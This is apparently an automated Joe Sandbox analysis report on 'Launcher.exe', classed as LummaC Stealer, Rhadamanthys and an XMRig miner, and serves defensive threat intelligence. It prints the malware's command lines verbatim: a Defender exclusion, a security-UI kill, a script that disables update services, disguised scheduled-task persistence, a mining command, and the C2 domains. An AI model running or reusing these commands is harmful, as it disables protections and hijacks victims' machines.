Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Launcher.exe

Overview

General Information

Sample name:Launcher.exe
Analysis ID:1637040
MD5:d91b1e9db00162b86d2d3c14e1a943ce
SHA1:e487b841d7c5f6eb48d0cdd3d36b340636591abe
SHA256:b1938f21d058442903d3d4c4a2aed153d59300cffd933e213acbb9b5e7d7a4be
Infos:

Detection

LummaC Stealer, RHADAMANTHYS, Xmrig
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Schedule system process
Sigma detected: Xmrig
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected LummaC Stealer
Yara detected RHADAMANTHYS Stealer
Yara detected Xmrig cryptocurrency miner
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject code into remote processes
DNS related to crypt mining pools
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
PE file contains section with special chars
PE file has nameless sections
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Potential Crypto Mining Activity
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Windows Service Tampering
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Launcher.exe (PID: 7732 cmdline: "C:\Users\user\Desktop\Launcher.exe" MD5: D91B1E9DB00162B86D2D3C14E1A943CE)
    • cmd.exe (PID: 7436 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7520 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
    • cmd.exe (PID: 7556 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5428 cmdline: powershell -Command "Get-WmiObject Win32_PortConnector" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 5832 cmdline: C:\Windows\system32\cmd.exe /d /s /c "net session" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7652 cmdline: net session MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 6096 cmdline: C:\Windows\system32\net1 session MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 3040 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 4508 cmdline: taskkill /F /IM SecHealthUI.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
    • cmd.exe (PID: 3940 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1208 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 4284 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1844 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • xzuucncwbxucqic.exe (PID: 7588 cmdline: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe MD5: C565BB41F99B97BBBFCC781D595BC152)
      • xzuucncwbxucqic.exe (PID: 5700 cmdline: "C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
    • wxymrnibweqciwn.exe (PID: 7988 cmdline: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe MD5: D72B6A0764E5D144F92DCCC3E4B23DFE)
      • svchost.exe (PID: 4960 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • fontdrvhost.exe (PID: 6972 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
          • WerFault.exe (PID: 2888 cmdline: C:\Windows\system32\WerFault.exe -u -p 6972 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • qzemwxiuzucyxcx.exe (PID: 7500 cmdline: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe MD5: 9D485AE46ACBC7D22DD0655264F3D959)
      • tasklist.exe (PID: 7580 cmdline: "tasklist" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • conhost.exe (PID: 3172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1596 cmdline: "powershell" -Command "Get-WmiObject Win32_PortConnector" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1928 cmdline: "cmd.exe" /C schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 2236 cmdline: schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • cmd.exe (PID: 1912 cmdline: "cmd.exe" /C timeout 5 && del "C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 3116 cmdline: timeout 5 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • niyrycbicwuyiuc.exe (PID: 4284 cmdline: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe MD5: 91C7FC26A530DFE8BAF84C9D39646895)
      • powershell.exe (PID: 7868 cmdline: powershell -Command "Get-WmiObject Win32_PortConnector" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5540 cmdline: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2968 cmdline: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 2956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2896 cmdline: cmd.exe /c timeout /t 5 /nobreak >nul & del "C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 3380 cmdline: timeout /t 5 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • svchost.exe (PID: 7852 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 7892 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 7908 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • sppsvc.exe (PID: 7972 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • svchost.exe (PID: 8020 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 8068 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 4944 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 4936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MicrosoftEdgeUpdate.exe (PID: 7588 cmdline: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe MD5: 9D485AE46ACBC7D22DD0655264F3D959)
  • powershell.exe (PID: 3488 cmdline: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7216 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7456 cmdline: C:\Windows\system32\WerFault.exe -pss -s 472 -p 6972 -ip 6972 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7528 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • RtkAudUService64a.exe (PID: 4132 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2 MD5: 037F02C0AB286C14EB4EEFF4078F8D34)
    • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: LummaC

{"C2 url": ["menuedgarli.shop/AUIqn", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "9eddd878e03715edd627f50c1f29ec6d309b2d28521a9b9872d266ca"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    dump.pcapMacOS_Cryptominer_Xmrig_241780a1unknownunknown
    • 0xf1062f:$a1: mining.set_target
    • 0xf0a76f:$a2: XMRIG_HOSTNAME
    • 0xf0cc7b:$a3: Usage: xmrig [OPTIONS]
    • 0xf0a747:$a4: XMRIG_VERSION

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000040.00000002.2496546660.000001FE48C69000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000001E.00000003.1861315526.0000000000970000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
        00000040.00000002.2492130397.00000021331BA000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000040.00000000.1979728835.00007FF7283B4000.00000002.00000001.01000000.0000000F.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000040.00000000.1979728835.00007FF7283B4000.00000002.00000001.01000000.0000000F.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
            • 0x12da08:$a1: mining.set_target
            • 0x1284e8:$a2: XMRIG_HOSTNAME
            • 0x12a5b0:$a3: Usage: xmrig [OPTIONS]
            • 0x1284c0:$a4: XMRIG_VERSION
            Click to see the 16 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            29.2.xzuucncwbxucqic.exe.400000.1.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              29.2.xzuucncwbxucqic.exe.400000.1.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                56.3.svchost.exe.55e0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  56.3.svchost.exe.53c0000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    56.3.svchost.exe.55e0000.7.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 6 entries

                      Sigma Signatures

                      Bitcoin Miner

                      barindex
                      Sigma detected: Xmrig
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4000, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, ProcessId: 4132, ProcessName: RtkAudUService64a.exe

                      System Summary

                      barindex
                      Sigma detected: Files With System Process Name In Unsuspected Locations
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ProcessId: 4284, TargetFilename: C:\ProgramData\WinUpdate32\RuntimeBroker.exe
                      Sigma detected: Potential Crypto Mining Activity
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4000, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, ProcessId: 4132, ProcessName: RtkAudUService64a.exe
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Launcher.exe", ParentImage: C:\Users\user\Desktop\Launcher.exe, ParentProcessId: 7732, ParentProcessName: Launcher.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", ProcessId: 3940, ProcessName: cmd.exe
                      Sigma detected: Suspicious Windows Service Tampering
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", CommandLine: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ParentImage: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ParentProcessId: 4284, ParentProcessName: niyrycbicwuyiuc.exe, ProcessCommandLine: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", ProcessId: 5540, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Launcher.exe", ParentImage: C:\Users\user\Desktop\Launcher.exe, ParentProcessId: 7732, ParentProcessName: Launcher.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", ProcessId: 3940, ProcessName: cmd.exe
                      Sigma detected: Suspicious Add Scheduled Task Parent
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, CommandLine: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ParentImage: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ParentProcessId: 4284, ParentProcessName: niyrycbicwuyiuc.exe, ProcessCommandLine: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, ProcessId: 2968, ProcessName: schtasks.exe
                      Sigma detected: Suspicious Schtasks From Env Var Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe", CommandLine: schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe", CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "cmd.exe" /C schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1928, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe", ProcessId: 2236, ProcessName: schtasks.exe
                      Sigma detected: Uncommon Svchost Parent Process
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe, ParentImage: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe, ParentProcessId: 7988, ParentProcessName: wxymrnibweqciwn.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 4960, ProcessName: svchost.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
